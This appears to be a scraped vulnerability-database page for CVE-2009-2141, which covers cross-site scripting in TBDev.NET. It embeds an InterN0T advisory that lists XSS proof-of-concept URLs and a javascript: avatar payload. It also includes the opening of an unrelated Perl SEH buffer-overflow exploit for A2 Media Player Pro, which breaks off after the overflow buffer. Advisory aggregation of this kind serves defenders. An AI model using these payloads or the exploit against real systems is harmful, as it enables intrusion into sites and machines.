CVE-2009-2141
Published 2009-06-22
CVE-2009-2141: Multiple cross-site scripting (XSS) vulnerabilities in TBDev.NET 01-01-08 allow remote attackers to inject arbitrary web script or HTML via (1) the returnto…
Priority: P4 · 18 · medium · 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.48% (70.8th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in TBDev.NET 01-01-08 allow remote attackers to inject arbitrary web script or HTML via (1) the returnto parameter to makepoll.php, (2) the returnto parameter in a delete action to polls.php, or the (3) Info or (4) Avatar field to my.php.
No detection rules found.
Exploit-DB
A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow (SEH)
exploitdb·2009-08-06
CVE-2009-4549 A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# A2 Media Player ProV2.51(.m3u /m3l)Universal Local Buffer Exploit (SEH)
# ## easy #### this work sooooooooo good####################################
############################################################################
##Thanks for WwW.Sec-ArT.CoM/cc team ##and 3asfh.net team###################
##AND special THANKS FOR His0k4 i respect him so much god with him #########
############################################################################
# http://download.cnet.com/A2-Media-Player-Pro/3000-2141_4-10059847.html
############################################################################
my $bof="\x41" x 4103;
my $nsh="\xEB\x06\x90\x90"
Exploit-DB
tbdev 01-01-2008 - Multiple Vulnerabilities
exploitdb·2009-06-12
CVE-2009-2141 tbdev 01-01-2008 - Multiple Vulnerabilities
---
TBDev - Cross Site Scripting and HTML Injection Vulnerabilities
Version Affected: 01-01-2008 (16th January 2008) (newest)
Info: TBDEV.NET is a project to further enhance, update and develop a
software (php peer-to-peer) from the original torrentbits/bytemonsoon
source code.
Credits: InterN0T
External Links:
http://www.tbdev.net
-:: The Advisory ::-
Vulnerable Function / ID Calls:
returnto
Cross Site Scripting: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=>alert(0)
http://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=>alert(0)alert(0) << is reflected
locally only!
2) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Avatar field: javascript:alert(0)
2b) Affected Sites by HTML Inj
No writeups or analysis indexed.
http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.html
http://secunia.com/advisories/35378
https://www.exploit-db.com/exploits/8942
Published: 2009-06-22